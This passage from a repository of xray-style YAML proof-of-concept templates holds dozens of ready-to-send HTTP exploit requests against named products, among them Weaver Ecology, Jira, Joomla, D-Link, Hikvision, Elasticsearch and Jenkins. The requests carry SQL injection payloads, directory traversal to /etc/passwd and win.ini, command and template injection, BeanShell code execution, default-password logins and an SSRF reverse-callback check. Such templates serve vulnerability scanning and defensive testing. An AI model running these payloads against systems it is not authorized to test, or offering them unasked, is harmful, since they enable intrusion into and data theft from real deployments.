6 | request: 7 | cache: true 8 | method: GET 9 | path: /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t 10 | follow_redirects: false 11 | expression: response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com" 12 | expression: r0() 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | links: 16 | - https://blog.csdn.net/ystyaoshengting/article/details/82734888 17 | Affected Version: V5.7 sp1 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/discuz-wechat-plugins-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wechat-plugins-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /plugin.php?id=wechat:wechat&ac=wxregister 10 | follow_redirects: false 11 | expression: response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com") 12 | expression: r0() 13 | detail: 14 | author: JrD 15 | links: 16 | - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dlink-cve-2019-17506.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2019-17506 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /getcfg.php 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded 12 | body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 13 | follow_redirects: false 14 | expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"") 15 | expression: r0() 16 | detail: 17 | author: l1nk3r,Huasir(https://github.com/dahua966/) 18 | links: 19 | - https://xz.aliyun.com/t/6453 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dlink-cve-2020-25078-account-disclosure.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2020-25078-account-disclosure 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /config/getuser?index=0 10 | follow_redirects: false 11 | expression: response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") 12 | expression: r0() 13 | detail: 14 | author: kzaopa(https://github.com/kzaopa) 15 | links: 16 | - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/docker-api-unauthorized-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-api-unauthorized-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /info 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") 12 | expression: r0() 13 | detail: 14 | author: j4ckzh0u(https://github.com/j4ckzh0u) 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/druid-monitor-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-druid-monitor-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /druid/index.html 10 | expression: response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") 11 | expression: r0() 12 | detail: 13 | author: met7or 14 | links: 15 | - https://github.com/alibaba/druid 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/duomicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-duomicms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) 10 | follow_redirects: false 11 | expression: response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935") 12 | expression: r0() 13 | detail: 14 | author: hanxiansheng26(https://github.com/hanxiansheng26) 15 | links: 16 | - https://xz.aliyun.com/t/2828 17 | Affected Version: duomicms<3.0 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dvr-cve-2018-9995.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dvr-cve-2018-9995 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /device.rsp?opt=user&cmd=list 10 | headers: 11 | Cookie: uid=admin 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback") 14 | expression: r0() 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | links: 18 | - https://s.tencent.com/research/bsafe/474.html 19 | Affected Version: DVR 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/e-zkeco-cnvd-2020-57264-read-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /iclock/ccccc/windows/win.ini 10 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 11 | expression: r0() 12 | detail: 13 | author: ThestaRY (https://github.com/ThestaRY7/) 14 | links: 15 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264 16 | info: E-ZKEco readfileCNVD-2020-57264 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-filedownload-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-filedownload-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/weaver/") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-javabeanshell-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-javabeanshell-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(40000, 44800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /weaver/bsh.servlet.BshServlet 13 | body: bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 14 | follow_redirects: false 15 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 16 | expression: r0() 17 | detail: 18 | author: l1nk3r 19 | links: 20 | - https://www.weaver.com.cn/cs/securityDownload.asp 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-springframework-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-springframework-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/weaver/") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-syncuserinfo-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-syncuserinfo-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(40000, 44800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null 13 | follow_redirects: true 14 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 15 | expression: r0() 16 | detail: 17 | author: MaxSecurity(https://github.com/MaxSecurity) 18 | links: 19 | - https://www.weaver.com.cn/ 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecshop-cnvd-2020-58823-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecshop-cnvd-2020-58823-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /delete_cart_goods.php 12 | body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) 13 | expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 14 | expression: r0() 15 | detail: 16 | author: 凉风(http://webkiller.cn/) 17 | links: 18 | - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/eea-info-leak-cnvd-2021-10543.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-eea-info-leak-cnvd-2021-10543 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /authenticationserverservlet 10 | expression: response.status == 200 && "(.*?)".bmatches(response.body) && "(.*?)".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: Search?=Null 14 | links: 15 | - https://exp1orer.github.io 16 | description: MessageSolution Enterprise Email Archiving (EEA) Info Leak. 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/elasticsearch-cve-2015-3337-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-3337-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: X.Yang 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/etouch-v2-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etouch-v2-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' 10 | expression: response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b") 11 | expression: r0() 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://github.com/mstxq17/CodeCheck/ 16 | - https://www.anquanke.com/post/id/168991 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/fangweicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fangweicms-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ 18 | Affected Version: "4.3" 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/feifeicms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-feifeicms-lfr 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=Admin-Data-down&id=../../Conf/config.php 10 | expression: response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r(http://www.lmxspace.com/) 15 | links: 16 | - http://foreversong.cn/archives/1378 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/flink-jobmanager-cve-2020-17519-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 10 | expression: response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/gilacms-cve-2020-5515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gilacms-cve-2020-5515 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /admin/sql?query=SELECT%20md5({{r1}}) 12 | expression: response.body.bcontains(bytes(md5(string(r1)))) 13 | expression: r0() 14 | detail: 15 | author: PickledFish(https://github.com/PickledFish) 16 | links: 17 | - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/glassfish-cve-2017-1000028-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-glassfish-cve-2017-1000028-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:") 12 | expression: r0() 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0 17 | version: <4.1.0 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/grafana-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-grafana-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login 10 | headers: 11 | Content-Type: application/json 12 | body: '{"user":"admin","password":"admin"}' 13 | follow_redirects: false 14 | expression: response.status == 200 && response.body.bcontains(b"\"message\":\"Logged in\"") 15 | expression: r0() 16 | detail: 17 | author: For3stCo1d (https://github.com/For3stCo1d) 18 | description: "grafana-default-password" 19 | links: 20 | - https://www.jianshu.com/p/dd27f6a48cf8 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/hadoop-yarn-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hadoop-yarn-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /ws/v1/cluster/info 10 | headers: 11 | Content-Type: application/json 12 | follow_redirects: true 13 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"resourceManagerVersionBuiltOn") && response.body.bcontains(b"hadoopVersion") 14 | expression: r0() 15 | detail: 16 | author: p0wd3r,sharecast 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/hikvision-cve-2017-7921.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-cve-2017-7921 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /system/deviceInfo?auth=YWRtaW46MTEK 10 | follow_redirects: false 11 | expression: response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"") 12 | expression: r0() 13 | detail: 14 | author: whwlsfb(https://github.com/whwlsfb) 15 | links: 16 | - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/huawei-home-gateway-hg659-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-huawei-home-gateway-hg659-fileread 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /lib///....//....//....//....//....//....//....//....//etc//passwd 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: B1anda0(https://github.com/B1anda0) 14 | links: 15 | - https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4210 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/inspur-tscev4-cve-2020-21224-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-inspur-tscev4-cve-2020-21224-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /login 13 | body: op=login&username=1 2\',\'1\'\);`expr%20{{r1}}%20%2b%20{{r2}}` 14 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string(r1 + r2))) 15 | expression: r0() 16 | detail: 17 | author: jingling(https://github.com/shmilylty) 18 | links: 19 | - https://github.com/NS-Sp4ce/Inspur 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jboss-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jmx-console/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") 12 | expression: r0() 13 | detail: 14 | author: FiveAourThe(https://github.com/FiveAourThe) 15 | links: 16 | - https://xz.aliyun.com/t/6103 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jellyfin-cve-2021-29490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jellyfin-cve-2021-29490 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /Images/Remote?imageUrl=http://baidu.com 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(bytes("baidu.com")) 12 | expression: r0() 13 | detail: 14 | author: 曦shen 15 | links: 16 | - https://mp.weixin.qq.com/s/lZcjStsMKz-VeP-KjU2H7g 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jellyfin-file-read-cve-2021-21402.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jellyfin-file-read-cve-2021-21402 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ 10 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 11 | expression: r0() 12 | detail: 13 | author: Print1n(https://github.com/Print1n) 14 | links: 15 | - https://blog.csdn.net/qq_41503511/article/details/116274406 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jenkins-cve-2018-1000600.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000600 2 | manual: true 3 | transport: http 4 | set: 5 | reverse: newReverse() 6 | reverseUrl: reverse.url 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} 13 | expression: response.status == 200 && reverse.wait(5) 14 | expression: r0() 15 | detail: 16 | author: PickledFish(https://github.com/PickledFish) 17 | links: 18 | - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jetty-cve-2021-28164.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jetty-cve-2021-28164 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /%2e/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"") 12 | expression: r0() 13 | detail: 14 | author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x) 15 | links: 16 | - https://www.linuxlz.com/aqld/2309.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jira-cve-2019-8442.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8442 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml 10 | expression: response.status == 200 && response.body.bcontains(bytes(string(b"com.atlassian.jira"))) && response.content_type.contains("application/xml") 11 | expression: r0() 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - https://nvd.nist.gov/vuln/detail/CVE-2019-8442 16 | Affected Version: <7.13.4, 8.00-8.0.4, 8.1.0-8.1.1 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jira-cve-2019-8449.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8449 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false 10 | expression: response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users") 11 | expression: r0() 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://xz.aliyun.com/t/7219 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jira-cve-2020-14179.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14179 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /secure/QueryComponent!Default.jspa 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"com.atlassian.jira") 12 | expression: r0() 13 | detail: 14 | author: harris2015(https://github.com/harris2015) 15 | links: 16 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jira-cve-2020-14181.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14181 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomLowercase(8) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /secure/ViewUserHover.jspa?username={{r}} 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira")) 14 | expression: r0() 15 | detail: 16 | author: whwlsfb(https://github.com/whwlsfb) 17 | links: 18 | - https://www.tenable.com/cve/CVE-2020-14181 19 | - https://twitter.com/ptswarm/status/1318914772918767619 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/joomla-cve-2017-8917-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2017-8917-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) 10 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/joomla-cve-2018-7314-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2018-7314-sql 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X 12 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: 南方有梦(http://github.com/hackgov) 16 | links: 17 | - https://www.exploit-db.com/exploits/44160 18 | Affected Version: 3.0.2 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/jupyter-notebook-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jupyter-notebook-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /terminals/3 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"terminals/websocket") && !response.body.bcontains(b"Password:") 12 | expression: r0() 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 15 | links: 16 | - https://vulhub.org/#/environments/jupyter/notebook-rce/ 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kafka-manager-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kafka-manager-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: / 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Add Cluster") 12 | expression: r0() 13 | detail: 14 | author: Aquilao(https://github.com/Aquilao) 15 | links: 16 | - https://blog.csdn.net/qq_36923426/article/details/111361158 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kibana-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /app/kibana 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b".kibanaWelcomeView") 12 | expression: r0() 13 | detail: 14 | author: Isaac(https://github.com/IsaacQiang) 15 | links: 16 | - https://zhuanlan.zhihu.com/p/61215662 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kingsoft-v8-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kingsoft-v8-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /inter/ajax.php?cmd=get_user_login_cmd 10 | body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}' 11 | follow_redirects: true 12 | expression: response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession") 13 | expression: r0() 14 | detail: 15 | author: B1anda0(https://github.com/B1anda0) 16 | links: 17 | - https://idc.wanyunshuju.com/aqld/2123.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kong-cve-2020-11710-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kong-cve-2020-11710-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: / 10 | expression: response.status == 200 && response.body.bcontains(b"kong_env") 11 | r1: 12 | request: 13 | cache: true 14 | method: GET 15 | path: /status 16 | expression: response.status == 200 && response.body.bcontains(b"kong_db_cache_miss") 17 | expression: r0() && r1() 18 | detail: 19 | author: Loneyer 20 | links: 21 | - https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw 22 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kubernetes-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kubernetes-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/nodes 10 | expression: 'response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"\"kubeletVersion\": \"v") && response.body.bcontains(b"\"containerRuntimeVersion\"")' 11 | expression: r0() 12 | detail: 13 | author: mumu0215(https://github.com/mumu0215) 14 | links: 15 | - http://luckyzmj.cn/posts/15dff4d3.html 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/maccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccms-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 12 | follow_redirects: false 13 | expression: response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: hanxiansheng26(https://github.com/hanxiansheng26) 17 | links: 18 | - 